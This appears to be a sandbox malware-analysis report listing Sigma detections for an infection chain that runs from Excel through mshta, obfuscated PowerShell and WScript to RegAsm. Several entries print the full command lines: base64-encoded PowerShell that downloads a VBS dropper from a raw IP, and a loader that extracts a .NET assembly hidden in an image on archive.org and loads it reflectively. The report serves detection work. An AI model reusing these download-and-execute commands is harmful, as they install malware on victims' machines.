'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3Nl
                    Sigma detected: Suspicious MSHTA Child Process
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgI
                    Sigma detected: Suspicious Microsoft Office Child Process
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3480, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3764, ProcessName: mshta.exe
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3876, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" , ProcessId: 4080, ProcessName: wscript.exe
                    Sigma detected: Change PowerShell Policies to an Insecure Level
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3Nl
                    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3876, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.cmdline", ProcessId: 3976, ProcessName: csc.exe
                    Sigma detected: Excel Network Connections
                    Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3480, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                    Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3876, TargetFilename: C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS
                    Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jfaasddkn", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jfaasddkn", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 1908, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jfaasddkn", ProcessId: 1432, ProcessName: RegAsm.exe
                    Sigma detected: Suspicious Office Outbound Connections
                    Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3480, Protocol: tcp, SourceIp: 188.114.96.3, SourceIsIpv6: false, SourcePort: 443
                    Sigma detected: Usage Of Web Request Commands And Cmdlets
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSA
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3876, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" , ProcessId: 4080, 